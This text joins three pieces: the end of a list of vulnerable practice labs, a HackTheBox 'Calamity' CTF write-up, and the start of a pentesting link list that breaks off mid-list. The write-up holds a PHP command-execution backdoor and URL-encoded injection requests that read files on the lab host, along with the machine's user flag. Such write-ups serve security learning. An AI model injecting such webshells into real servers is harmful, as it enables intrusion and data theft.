[SSRF_Vulnerable_Lab](https://github.com/incredibleindishell/SSRF_Vulnerable_Lab) - This Lab contain the sample codes which are vulnerable to Server-Side Request Forgery attack * [LFI-labs](https://github.com/paralax/lfi-labs) - Small set of PHP scripts to practice exploiting LFI, RFI and CMD injection vulns * [Commix-testbed](https://github.com/commixproject/commix-testbed) - A collection of web pages, vulnerable to command injection flaws * [File-Upload-Lab](https://github.com/LunaM00n/File-Upload-Lab) - Damn Vulnerable File Upload V 1.1 * [Upload-labs](https://github.com/c0ny1/upload-labs) - A summary of all types of uploading vulnerabilities for you * [XXE-Lab](https://github.com/c0ny1/xxe-lab) - A XXE vulnerability Demo containing language versions such as PHP, Java, python, C#, etc * [Vulnerable-Flask-App](https://github.com/anil-yelken/Vulnerable-Flask-App) - Erlik2 Vulnerable-Flask-App provided by [anil-yelken](https://github.com/anil-yelken). #### Simulation Range * [Fopnp](https://github.com/brandon-rhodes/fopnp/tree/m/playground) - A Network Playground for 《Foundations of Python Network Programming》 * [CyberRange](https://github.com/secdevops-cuse/CyberRange) - The Open-Source AWS Cyber Range #### Honeyhots * [DecoyMini](https://github.com/decoymini/DecoyMini/) - A highly scalable, safe, free enterprise honeypots #### CTF challenges * [Vulnhub](https://www.vulnhub.com/) - VulnHub provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration * [TryHackMe](https://tryhackme.com/) - TryHackMe is a free online platform for learning cyber security, using hands-on exercises and labs, all through your browser! * [Hackthebox](https://www.hackthebox.com/) - Hack The Box is a massive, online cybersecurity training platform, allowing individuals, companies, universities and all kinds of organizations around the world to level up their hacking skills. * [Root Me](https://www.root-me.org/) - Root Me allows everyone to test and improve their knowledge in computer security and hacking. * [Pentestit](https://lab.pentestit.ru/) - Penetration testing laboratories "Test lab" emulate an IT infrastructure of real companies and are created for a legal pen testing and improving penetration testing skills * [Pentesterlab](https://pentesterlab.com/) - Learn Web Penetration Testing: The Right Way * [Cyberseclabs](https://www.cyberseclabs.co.uk/) - At CyberSecLabs, we aim to provide secure, high-quality training services that allow information security students the opportunity to safely learn and practice penetration testing skills. * [Web Security Academy](https://portswigger.net/web-security) - Free, online web security training from the creators of Burp Suite * [Vulnmachines](https://www.vulnmachines.com/) - A place to learn and improve penetration testing/ethical hacking skills for FREE ### Excellent project * [Rawsec's CyberSecurity Inventory](https://inventory.raw.pm/tools.html#title-tools-osint-and-reconnaissance) - An inventory of tools and resources about CyberSecurity. * [All-Defense-Tool](https://github.com/guchangan1/All-Defense-Tool) - A List for Defense Tools. * [Awesome-POC](https://github.com/Threekiii/Awesome-POC) - A POC knowledge base of various vulnerabilities.
# MACHINE CHALLENGE: CALAMITY ## Challenge Description ##### Own system Type below the hash that is inside the root.txt file in the machine. The file can be found under /root on Linux machines and at the Desktop of the Administrator on Windows. ##### Own User Type below the hash that is inside the user.txt file in the machine. The file can be found under /home/{username} on Linux machines and at the Desktop of the user on Windows. ``` IP Address: 10.10.10.27 OS: Linux ``` ### PORTSCANNING w/ NMAP ``` $ sudo nmap -A -sS -T4 10.10.10.27 > nmap.out PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 b6:46:31:9c:b5:71:c5:96:91:7d:e4:63:16:f9:59:a2 (RSA) | 256 10:c4:09:b9:48:f1:8c:45:26:ca:f6:e1:c2:dc:36:b9 (ECDSA) |_ 256 a8:bf:dd:c0:71:36:a8:2a:1b:ea:3f:ef:66:99:39:75 (EdDSA) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Brotherhood Software ``` So we have two open services - ssh(22) and http(80). ### ENUMERATING PORT 80 (HTTP) Visiting the webpage we are greeted with "Brotherhood Software" splash screen.. ``` http://10.10.10.27 ``` <img src="calamity.index.html.jpg" width=500px/> ##### GOBUSTER Bruteforce enumeration using `gobuster`.. ``` $ gobuster -e -u 10.10.10.27 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt Gobuster v1.2 OJ Reeves (@TheColonial) ===================================================== [+] Mode : dir [+] Url/Domain : http://10.10.10.27/ [+] Threads : 10 [+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes : 301,302,307,200,204 [+] Expanded : true ===================================================== http://10.10.10.27/uploads (Status: 301) ``` Okay, so we found a directory called `uploads`. <img src="calamity.uploads.jpg" width=500px/> Looks almost like a temp directory that other users are uploading their attack scripts? ##### DIRBUSTER Okay, let's try other enumeration tools. ``` $ dirb http://10.10.10.27 /usr/share/wordlists/dirb/small.txt -x /usr/share/wordlists/dirb/extensions_common.txt ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sun Dec 24 02:10:11 2017 URL_BASE: http://10.10.10.27/ WORDLIST_FILES: /usr/share/wordlists/dirb/small.txt EXTENSIONS_FILE: /usr/share/wordlists/dirb/extensions_common.txt | ()(.asp)(.aspx)(.bat)(.c)(.cfm)(.cgi)(.com)(.dll)(.exe)(.htm)(.html)(.inc)(.jhtml)(.jsa)(.jsp)(.log)(.mdb)(.nsf)(.php)(.phtml)(.pl)(.reg)(.sh)(.shtml)(.sql)(.txt)(.xml)(/) [NUM = 29] ----------------- GENERATED WORDS: 959 ---- Scanning URL: http://10.10.10.27/ ---- + http://10.10.10.27/admin.php (CODE:200|SIZE:451) + http://10.10.10.27/icons/ (CODE:403|SIZE:292) + http://10.10.10.27/index.html (CODE:200|SIZE:514) ==> DIRECTORY: http://10.10.10.27/uploads/ + http://10.10.10.27/uploads/ (CODE:200|SIZE:2876) ---- Entering directory: http://10.10.10.27/uploads/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ----------------- END_TIME: Sun Dec 24 03:44:49 2017 DOWNLOADED: 27811 - FOUND: 4 ``` Now this is interesting.. we found something called `admin.php` that looks like something fun to attack. `uploads/` seems like something we'll need to leverage as well. <img src="calamity.admin.php.jpg" width=500px/> ##### BURPSUITE Let's see what we can learn by observing the request/response of `admin.php` through the eyes of `burpsuite`. ``` <REQUEST> GET /admin.php HTTP/1.1 Host: 10.10.10.27 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 </REQUEST> ``` ``` <RESPONSE> HTTP/1.1 200 OK Date: Sun, 24 Dec 2017 07:25:43 GMT Server: Apache/2.4.18 (Ubuntu) Vary: Accept-Encoding Content-Length: 451 Connection: close Content-Type: text/html; charset=UTF-8 <html><body> <form method="post"> Password: <input type="text" name="user"><br> Username: <input type="password" name="pass"> <input type="submit" value="Log in to the powerful administrator page"> <!-- password is:skoupidotenekes--> </form> </body></html> </RESPONSE> ``` Seriously? The password is embedded as a comment? ``` <REQUEST> POST /admin.php HTTP/1.1 Host: 10.10.10.27 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://10.10.10.27/admin.php Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 31 user=skoupidotenekes&pass=admin </REQUEST> ``` ``` <RESPONSE> HTTP/1.1 200 OK Date: Sun, 24 Dec 2017 07:34:17 GMT Server: Apache/2.4.18 (Ubuntu) Vary: Accept-Encoding Content-Length: 467 Connection: close Content-Type: text/html; charset=UTF-8 <html><body> <form method="post"> Password: <input type="text" name="user"><br> Username: <input type="password" name="pass"> <input type="submit" value="Log in to the powerful administrator page"> <!-- password is:skoupidotenekes--> </form> </body></html> GET OUT OF HERE </RESPONSE> ``` Well, we're going to have to figure out what the username it is expecting. ##### HYDRA ``` $ hydra 10.10.10.27 -s 80 http-form-post "/:user=^USER^&pass=^PASS^:GET OUT OF HERE" -p skoupidotenekes -l admin Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2017-12-24 02:42:15 [DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task [DATA] attacking http-post-form://10.10.10.27:80//:user=^USER^&pass=^PASS^:GET OUT OF HERE [80][http-post-form] host: 10.10.10.27 login: admin password: skoupidotenekes 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2017-12-24 02:42:17 ``` Okay, so while building the `hydra` command, I realized that the form fields may be labelled `password` and then `user`, but in fact the password field is submitted as the username and the user field is submitted as the password. `hydra` confirms this is a valid username/password pair, so we just need to enter it as such. Here is what we see after "logging in".. <img src="calamity.admin.php-logged.in.jpg" width=500px/> ##### BURPSUITE AGAIN ``` <REQUEST> POST /admin.php HTTP/1.1 Host: 10.10.10.27 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://10.10.10.27/admin.php Cookie: adminpowa=noonecares Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 31 user=admin&pass=skoupidotenekes </REQUEST> ``` ``` <RESPONSE> HTTP/1.1 200 OK Date: Sun, 24 Dec 2017 07:50:19 GMT Server: Apache/2.4.18 (Ubuntu) Vary: Accept-Encoding Content-Length: 927 Connection: close Content-Type: text/html; charset=UTF-8 <html> <title>GOT U BEEJAY</title> <body> TADAA IT HAS NOTHING <br> what were you waiting for dude ?you know I aint finished creating<br> xalvas,the boss said I am a piece of shit and that I dont take my job seriously...but when all this is set up...Ima ask for double the money<br> just cauz he insulted me <br> Maybe he's still angry at me deleting the DB on the previous site...he should keep backups man ! <br> anyway I made an html interpreter to work on my php skills ! It wasn't easy I assure you...I'm just a P-R-O on PHP !!!!!!!!! <br> access in here is like 99% secure ,but even if that 1% reaches this page ,there's nothing they can do ! <br> html is super-harmless to our system! Try writing some simple stuff ...and see how difficult my job is and how underpaid I am <form method="get"> Your HTML: <input type="text" name="html"><br> <input type="submit" value="SHOW ME DA PAGE"> </form> </body></html> </RESPONSE> ``` Giving "foo" in the user field.. ``` <REQUEST> GET /admin.php?html=foo HTTP/1.1 Host: 10.10.10.27 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://10.10.10.27/admin.php Cookie: adminpowa=noonecares Connection: close Upgrade-Insecure-Requests: 1 </REQUEST> ``` ``` <RESPONSE> HTTP/1.1 200 OK Date: Sun, 24 Dec 2017 07:52:59 GMT Server: Apache/2.4.18 (Ubuntu) Vary: Accept-Encoding Content-Length: 930 Connection: close Content-Type: text/html; charset=UTF-8 <html> <title>GOT U BEEJAY</title> <body> TADAA IT HAS NOTHING <br> what were you waiting for dude ?you know I aint finished creating<br> xalvas,the boss said I am a piece of shit and that I dont take my job seriously...but when all this is set up...Ima ask for double the money<br> just cauz he insulted me <br> Maybe he's still angry at me deleting the DB on the previous site...he should keep backups man ! <br> anyway I made an html interpreter to work on my php skills ! It wasn't easy I assure you...I'm just a P-R-O on PHP !!!!!!!!! <br> access in here is like 99% secure ,but even if that 1% reaches this page ,there's nothing they can do ! <br> html is super-harmless to our system! Try writing some simple stuff ...and see how difficult my job is and how underpaid I am <form method="get"> Your HTML: <input type="text" name="html"><br> <input type="submit" value="SHOW ME DA PAGE"> </form> </body></html> foo </RESPONSE> ``` Okay.. so now what? Some sort of exploit that takes advantage of GET requests? Or vulnerabilities such as cross-site scripting to make some code execute? ### OWN USER So now that we have a way of injecting what ever code we want, what if we fed it a script like this one? ``` https://raw.githubusercontent.com/JohnTroony/php-webshells/development/simple-backdoor.php <!-- Simple PHP backdoor by DK (http://michaeldaw.org) --> <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; } ?> Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd <!-- http://michaeldaw.org 2006 --> ``` So we can inject this script into the admin.php page and feed it a command like `ls /home` to see what users we have: ``` http://10.10.10.27/admin.php?html=%3C%3Fphp++if(isset(%24_REQUEST[%27cmd%27])){+++++++++echo+%22%3Cpre%3E%22%3B+++++++++%24cmd+%3D+(%24_REQUEST[%27cmd%27])%3B+++++++++system(%24cmd)%3B+++++++++echo+%22%3C%2Fpre%3E%22%3B+++++++++die%3B+}++%3F%3E&cmd=ls+%2Fhome ``` .. and we get: ``` xalvas ``` Let's see what `xalvas` has in his home directory.. ``` http://10.10.10.27/admin.php?html=<%3Fphp++if(isset(%24_REQUEST['cmd'])){+++++++++echo+"<pre>"%3B+++++++++%24cmd+%3D+(%24_REQUEST['cmd'])%3B+++++++++system(%24cmd)%3B+++++++++echo+"<%2Fpre>"%3B+++++++++die%3B+}++%3F>&cmd=ls+-l+%2Fhome%2xalvas ``` ``` total 3148 drwxr-xr-x 2 xalvas xalvas 4096 Jun 27 13:07 alarmclocks drwxr-x--- 2 root xalvas 4096 Jun 29 14:00 app -rw-r--r-- 1 root root 225 Jun 27 18:16 dontforget.txt -rw-r--r-- 1 root root 1730 Dec 25 00:44 intrusions drwxrwxr-x 4 xalvas xalvas 4096 Jun 27 18:09 peda -rw-r--r-- 1 xalvas xalvas 3196724 Jun 27 12:23 recov.wav -r--r--r-- 1 root root 33 Jun 27 18:19 user.txt ``` Let's recover the `user.txt` flag first before we explore the other files that might help us escalate our priviledges to get root.. ``` http://10.10.10.27/admin.php?html=<%3Fphp++if(isset(%24_REQUEST['cmd'])){+++++++++echo+"<pre>"%3B+++++++++%24cmd+%3D+(%24_REQUEST['cmd'])%3B+++++++++system(%24cmd)%3B+++++++++echo+"<%2Fpre>"%3B+++++++++die%3B+}++%3F>&cmd=cat+%2Fhome%2Fxalvas%2Fuser.txt ``` ``` 0790e7be60d5cd7faeeb9ac550762e5e ``` Neat.. so we got user. Now we need to see how to get root. ### OWN MACHINE Let's poke around and see what other information we can obtain: ``` http://10.10.10.27/admin.php?html=<%3Fphp++if(isset(%24_REQUEST['cmd'])){+++++++++echo+"<pre>"%3B+++++++++%24cmd+%3D+(%24_REQUEST['cmd'])%3B+++++++++system(%24cmd)%3B+++++++++echo+"<%2Fpre>"%3B+++++++++die%3B+}++%3F>&cmd=ls+-l ``` ``` total 276 -r--r--r-- 1 www-data root 1865 Jun 27 11:36 admin.php -r--r--r-- 1 www-data root 56837 Jun 27 11:35 bg.png -r--r--r-- 1 www-data root 514 Jun 27 13:18 index.html -r--r--r-- 1 www-data root 212864 Jun 27 11:35 leet.png drwxrwxrwx 2 www-data root 4096 Dec 25 01:16 uploads ``` ``` http://10.10.10.27/admin.php?html=<%3Fphp++if(isset(%24_REQUEST['cmd'])){+++++++++echo+"<pre>"%3B+++++++++%24cmd+%3D+(%24_REQUEST['cmd'])%3B+++++++++system(%24cmd)%3B+++++++++echo+"<%2Fpre>"%3B+++++++++die%3B+}++%3F>&cmd=pwd ``` ``` /var/www/html ``` ``` http://10.10.10.27/admin.php?html=<%3Fphp++if(isset(%24_REQUEST['cmd'])){+++++++++echo+"<pre>"%3B+++++++++%24cmd+%3D+(%24_REQUEST['cmd'])%3B+++++++++system(%24cmd)%3B+++++++++echo+"<%2Fpre>"%3B+++++++++die%3B+}++%3F>&cmd=cat+%2Fhome%2Fxalvas%2Fdontforget.txt ``` ``` peda keeps commads history in the working dir...you should make a dir in /tmp and work from there keep in mind that tmp is not listable,so other users cannot see your files and folders (if you dont use extrmely simple names) ``` ``` http://10.10.10.27/admin.php?html=%3C%3Fphp++if(isset(%24_REQUEST[%27cmd%27])){+++++++++echo+%22%3Cpre%3E%22%3B+++++++++%24cmd+%3D+(%24_REQUEST[%27cmd%27])%3B+++++++++system(%24cmd)%3B+++++++++echo+%22%3C%2Fpre%3E%22%3B+++++++++die%3B+}++%3F%3E&cmd=cat+%2Fhome%2Fxalvas%2Fintrusions ``` ``` POSSIBLE INTRUSION BY BLACKLISTED PROCCESS nc ...PROCESS KILLED AT 2017-06-28 04:55:42.796288 POSSIBLE INTRUSION BY BLACKLISTED PROCCESS nc ...PROCESS KILLED AT 2017-06-28 05:22:11.228988 POSSIBLE INTRUSION BY BLACKLISTED PROCCESS nc ...PROCESS KILLED AT 2017-06-28 05:23:23.424719 POSSIBLE INTRUSION BY BLACKLISTED PROCCESS nc ...PROCESS KILLED AT 2017-06-29 02:43:57.083849 POSSIBLE INTRUSION BY BLACKLISTED PROCCESS python ...PROCESS KILLED AT 2017-06-29 02:48:47.909739 POSSIBLE INTRUSION BY BLACKLISTED PROCCESS sh ...PROCESS KILLED AT 2017-06-29 06:25:04.202315 POSSIBLE INTRUSION BY BLACKLISTED PROCCESS sh ...PROCESS KILLED AT 2017-06-29 06:25:04.780685 POSSIBLE INTRUSION BY BLACKLISTED PROCCESS python ...PROCESS KILLED AT 2017-06-29 06:25:06.209358 POSSIBLE INTRUSION BY BLACKLISTED PROCCESS nc ...PROCESS KILLED AT 2017-06-29 12:15:32.329358 POSSIBLE INTRUSION BY BLACKLISTED PROCCESS nc ...PROCESS KILLED AT 2017-06-29 12:15:32.330115 POSSIBLE INTRUSION BY BLACKLISTED PROCCESS nc ...PROCESS KILLED AT 2017-06-29 12:16:10.508710 POSSIBLE INTRUSION BY BLACKLISTED PROCCESS nc ...PROCESS KILLED AT 2017-06-29 12:16:10.510537 POSSIBLE INTRUSION BY BLACKLISTED PROCCESS python3 ...PROCESS KILLED AT 2017-12-24 10:30:28.836132 POSSIBLE INTRUSION BY BLACKLISTED PROCCESS nc ...PROCESS KILLED AT 2017-12-25 00:35:06.831325 POSSIBLE INTRUSION BY BLACKLISTED PROCCESS nc ...PROCESS KILLED AT 2017-12-25 00:38:06.450972 POSSIBLE INTRUSION BY BLACKLISTED PROCCESS nc ...PROCESS KILLED AT 2017-12-25 00:38:26.640503 POSSIBLE INTRUSION BY BLACKLISTED PROCCESS nc ...PROCESS KILLED AT 2017-12-25 00:44:43.524795 ``` ``` http://10.10.10.27/admin.php?html=%3C%3Fphp++if(isset(%24_REQUEST[%27cmd%27])){+++++++++echo+%22%3Cpre%3E%22%3B+++++++++%24cmd+%3D+(%24_REQUEST[%27cmd%27])%3B+++++++++system(%24cmd)%3B+++++++++echo+%22%3C%2Fpre%3E%22%3B+++++++++die%3B+}++%3F%3E&cmd=ls+-l+%2Fhome%2Fxalvas%2Fpeda ``` ``` total 216 -rw-rw-r-- 1 xalvas xalvas 157 Jun 27 18:09 LICENSE -rw-rw-r-- 1 xalvas xalvas 1162 Jun 27 18:09 README -rw-rw-r-- 1 xalvas xalvas 1939 Jun 27 18:09 README.md drwxrwxr-x 3 xalvas xalvas 4096 Jun 27 18:09 lib -rw-rw-r-- 1 xalvas xalvas 199072 Jun 27 18:09 peda.py -rw-rw-r-- 1 xalvas xalvas 2077 Jun 27 18:09 python23-compatibility.md ``` ``` http://10.10.10.27/admin.php?html=%3C%3Fphp++if(isset(%24_REQUEST[%27cmd%27])){+++++++++echo+%22%3Cpre%3E%22%3B+++++++++%24cmd+%3D+(%24_REQUEST[%27cmd%27])%3B+++++++++system(%24cmd)%3B+++++++++echo+%22%3C%2Fpre%3E%22%3B+++++++++die%3B+}++%3F%3E&cmd=ls+-l+%2Fhome%2Fxalvas%2Falarmclocks ``` ``` total 5708 -rw-r--r-- 1 root root 3196668 Jun 27 13:07 rick.wav -rw-r--r-- 1 root root 2645839 Jun 27 13:07 xouzouris.mp3 ``` ##### PEDA? ``` PEDA - Python Exploit Development Assistance for GDB Version: 1.0 Release: special public release, Black Hat USA 2012 0. Credits - Huy Phan (pdah) for reviewing code 1. Introduction PEDA is a Python GDB script with many handy commands to help speed up exploit development process on Linux/Unix. It is also a framework for writing custom interactive Python GDB commands. ``` ### RETIRED Unfortunately I wasn't able to progress to get the root.txt before the machine was retired. Would be interesting to read up on other people's write ups to see what would have been the next steps for priviledge escalation. ``` https://reboare.github.io/hackthebox/calamity.html ``` Seems like I lucked out by getting the user.txt as I only dumped the contents of the file without actually discovering the user password was in the audio files in the user's home directory and logging in. The remaining work to get root.txt seems quite involved and required a buffer overflow attack against an executable within the user's home directory.
# PENTESTING-BIBLE # Explore more than 2000 hacking articles saved over time as PDF. BROWSE HISTORY. # Created By Ammar Amer (Twitter @cry__pto) ## Support. *Paypal:* [![Donate via Paypal](https://www.paypalobjects.com/en_GB/i/btn/btn_donateCC_LG.gif)](https://paypal.me/AmmarAmerHacker) -1- 3 Ways Extract Password Hashes from NTDS.dit: https://www.hackingarticles.in/3-ways-extract-password-hashes-from-ntds-dit -2- 3 ways to Capture HTTP Password in Network PC: https://www.hackingarticles.in/3-ways-to-capture-http-password-in-network-pc/ -3- 3 Ways to Crack Wifi using Pyrit,oclHashcat and Cowpatty: www.hackingarticles.in/3-ways-crack-wifi-using-pyrit-oclhashcat-cowpatty/ -4-BugBounty @ Linkedln-How I was able to bypass Open Redirection Protection: https://medium.com/p/2e143eb36941 -5-BugBounty — “Let me reset your password and login into your account “-How I was able to Compromise any User Account via Reset Password Functionality: https://medium.com/p/a11bb5f863b3/share/twitter -6-“Journey from LFI to RCE!!!”-How I was able to get the same in one of the India’s popular property buy/sell company: https://medium.com/p/a69afe5a0899 -7-BugBounty — “I don’t need your current password to login into your account” - How could I completely takeover any user’s account in an online classi ed ads company: https://medium.com/p/e51a945b083d -8-BugBounty — “How I was able to shop for free!”- Payment Price Manipulation: https://medium.com/p/b29355a8e68e -9-Recon — my way: https://medium.com/p/82b7e5f62e21 -10-Reconnaissance: a eulogy in three acts: https://medium.com/p/7840824b9ef2 -11-Red-Teaming-Toolkit: https://github.com/infosecn1nja/Red-Teaming-Toolkit -12-Red Team Tips: https://vincentyiu.co.uk/ -13-Shellcode: A reverse shell for Linux in C with support for TLS/SSL: https://modexp.wordpress.com/2019/04/24/glibc-shellcode/ -14-Shellcode: Encrypting traffic: https://modexp.wordpress.com/2018/08/17/shellcode-encrypting-traffic/ -15-Penetration Testing of an FTP Server: https://medium.com/p/19afe538be4b -16-Reverse Engineering of the Anubis Malware — Part 1: https://medium.com/p/741e12f5a6bd -17-Privilege Escalation on Linux with Live examples: https://resources.infosecinstitute.com/privilege-escalation-linux-live-examples/ -18-Pentesting Cheatsheets: https://ired.team/offensive-security-experiments/offensive-security-cheetsheets -19-Powershell Payload Delivery via DNS using Invoke-PowerCloud: https://ired.team/offensive-security-experiments/payload-delivery-via-dns-using-invoke-powercloud -20-SMART GOOGLE SEARCH QUERIES TO FIND VULNERABLE SITES – LIST OF 4500+ GOOGLE DORKS: https://sguru.org/ghdb-download-list-4500-google-dorks-free/ -21-SQL Injection Cheat Sheet: https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/ -22-SQLmap’s os-shell + Backdooring website with Weevely: https://medium.com/p/8cb6dcf17fa4 -23-SQLMap Tamper Scripts (SQL Injection and WAF bypass) Tips: https://medium.com/p/c5a3f5764cb3 -24-Top 10 Essential NMAP Scripts for Web App Hacking: https://medium.com/p/c7829ff5ab7 -25-BugBounty — How I was able to download the Source Code of India’s Largest Telecom Service Provider including dozens of more popular websites!: https://medium.com/p/52cf5c5640a1 -26-Re ected XSS Bypass Filter: https://medium.com/p/de41d35239a3 -27-XSS Payloads, getting past alert(1): https://medium.com/p/217ab6c6ead7 -28-XS-Searching Google’s bug tracker to find out vulnerable source code Or how side-channel timing attacks aren’t that impractical: https://medium.com/p/50d8135b7549 -29-Web Application Firewall (WAF) Evasion Techniques: https://medium.com/@themiddleblue/web-application-firewall-waf-evasion-techniques -30-OSINT Resources for 2019: https://medium.com/p/b15d55187c3f -31-The OSINT Toolkit: https://medium.com/p/3b9233d1cdf9 -32-OSINT : Chasing Malware + C&C Servers: https://medium.com/p/3c893dc1e8cb -33-OSINT tool for visualizing relationships between domains, IPs and email addresses: https://medium.com/p/94377aa1f20a -34-From OSINT to Internal – Gaining Access from outside the perimeter: https://www.n00py.io/.../from-osint-to-internal-gaining-access-from-the-outside-the-perimeter -35-Week in OSINT #2018–35: https://medium.com/p/b2ab1765157b -36-Week in OSINT #2019–14: https://medium.com/p/df83f5b334b4 -37-Instagram OSINT | What A Nice Picture: https://medium.com/p/8f4c7edfbcc6 -38-awesome-osint: https://github.com/jivoi/awesome-osint -39-OSINT_Team_Links: https://github.com/IVMachiavelli/OSINT_Team_Links -40-Open-Source Intelligence (OSINT) Reconnaissance: https://medium.com/p/75edd7f7dada -41-Hacking Cryptocurrency Miners with OSINT Techniques: https://medium.com/p/677bbb3e0157 -42-A penetration tester’s guide to sub- domain enumeration: https://blog.appsecco.com/a-penetration-testers-guide-to-sub-domain-enumeration-7d842d5570f6?gi=f44ec9d8f4b5 -43-Packages that actively seeks vulnerable exploits in the wild. More of an umbrella group for similar packages: https://blackarch.org/recon.html -44-What tools I use for my recon during BugBounty: https://medium.com/p/ec25f7f12e6d -45-Command and Control – DNS: https://pentestlab.blog/2017/09/06/command-and-control-dns/ -46-Command and Control – WebDAV: https://pentestlab.blog/2017/09/12/command-and-control-webdav/ -47-Command and Control – Twitter: https://pentestlab.blog/2017/09/26/command-and-control-twitter/ -48-Command and Control – Kernel: https://pentestlab.blog/2017/10/02/command-and-control-kernel/ -49-Source code disclosure via exposed .git folder: https://pentester.land/tutorials/.../source-code-disclosure-via-exposed-git-folder.html -50-Pentesting Cheatsheet: https://hausec.com/pentesting-cheatsheet/ -51-Windows Userland Persistence Fundamentals: https://www.fuzzysecurity.com/tutorials/19.html -52-A technique that a lot of SQL injection beginners don’t know | Atmanand Nagpure write-up: https://medium.com/p/abdc7c269dd5 -53-awesome-bug-bounty: https://github.com/djadmin/awesome-bug-bounty -54-dostoevsky-pentest-notes: https://github.com/dostoevskylabs/dostoevsky-pentest-notes -55-awesome-pentest: https://github.com/enaqx/awesome-pentest -56-awesome-windows-exploitation: https://github.com/enddo/awesome-windows-exploitation -57-awesome-exploit-development: https://github.com/FabioBaroni/awesome-exploit-development -58-BurpSuit + SqlMap = One Love: https://medium.com/p/64451eb7b1e8 -59-Crack WPA/WPA2 Wi-Fi Routers with Aircrack-ng and Hashcat: https://medium.com/p/a5a5d3ffea46 -60-DLL Injection: https://pentestlab.blog/2017/04/04/dll-injection -61-DLL Hijacking: https://pentestlab.blog/2017/03/27/dll-hijacking -62-My Recon Process — DNS Enumeration: https://medium.com/p/d0e288f81a8a -63-Google Dorks for nding Emails, Admin users etc: https://d4msec.wordpress.com/2015/09/03/google-dorks-for-finding-emails-admin-users-etc -64-Google Dorks List 2018: https://medium.com/p/fb70d0cbc94 -65-Hack your own NMAP with a BASH one-liner: https://medium.com/p/758352f9aece -66-UNIX / LINUX CHEAT SHEET: cheatsheetworld.com/programming/unix-linux-cheat-sheet/ -67-Linux Capabilities Privilege Escalation via OpenSSL with SELinux Enabled and Enforced: https://medium.com/p/74d2bec02099 -68- information gathering: https://pentestlab.blog/category/information-gathering/ -69-post exploitation: https://pentestlab.blog/category/post-exploitation/ -70-privilege escalation: https://pentestlab.blog/category/privilege-escalation/ -71-red team: https://pentestlab.blog/category/red-team/ -72-The Ultimate Penetration Testing Command Cheat Sheet for Linux: https://www.hackingloops.com/command-cheat-sheet-for-linux/ -73-Web Application Penetration Testing Cheat Sheet: https://jdow.io/blog/2018/03/18/web-application-penetration-testing-methodology/ -74-Windows Kernel Exploits: https://pentestlab.blog/2017/04/24/windows-kernel-exploits -75-Windows oneliners to download remote payload and execute arbitrary code: https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/ -76-Windows-Post-Exploitation: https://github.com/emilyanncr/Windows-Post-Exploitation -77-Windows Post Exploitation Shells and File Transfer with Netcat for Windows: https://medium.com/p/a2ddc3557403 -78-Windows Privilege Escalation Fundamentals: https://www.fuzzysecurity.com/tutorials/16.html -79-Windows Privilege Escalation Guide: www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ -80-Windows Active Directory Post Exploitation Cheatsheet: https://medium.com/p/48c2bd70388 -81-Windows Exploitation Tricks: Abusing the User-Mode Debugger: https://googleprojectzero.blogspot.com/2019/04/windows-exploitation-tricks-abusing.html -82-VNC Penetration Testing (Port 5901): http://www.hackingarticles.in/vnc-penetration-testing -83- Big List Of Google Dorks Hacking: https://xspiyr.wordpress.com/2012/09/05/big-list-of-google-dorks-hacking -84-List of google dorks for sql injection: https://deadlyhacker.wordpress.com/2013/05/09/list-of-google-dorks-for-sql-injection/ -85-Download Google Dorks List 2019: https://medium.com/p/323c8067502c -86-Comprehensive Guide to Sqlmap (Target Options): http://www.hackingarticles.in/comprehensive-guide-to-sqlmap-target-options15249-2 -87-EMAIL RECONNAISSANCE AND PHISHING TEMPLATE GENERATION MADE SIMPLE: www.cybersyndicates.com/.../email-reconnaissance-phishing-template-generation-made-simple -88-Comprehensive Guide on Gobuster Tool: https://www.hackingarticles.in/comprehensive-guide-on-gobuster-tool/ -89-My Top 5 Web Hacking Tools: https://medium.com/p/e15b3c1f21e8 -90-[technical] Pen-testing resources: https://medium.com/p/cd01de9036ad -91-File System Access on Webserver using Sqlmap: http://www.hackingarticles.in/file-system-access-on-webserver-using-sqlmap -92-kali-linux-cheatsheet: 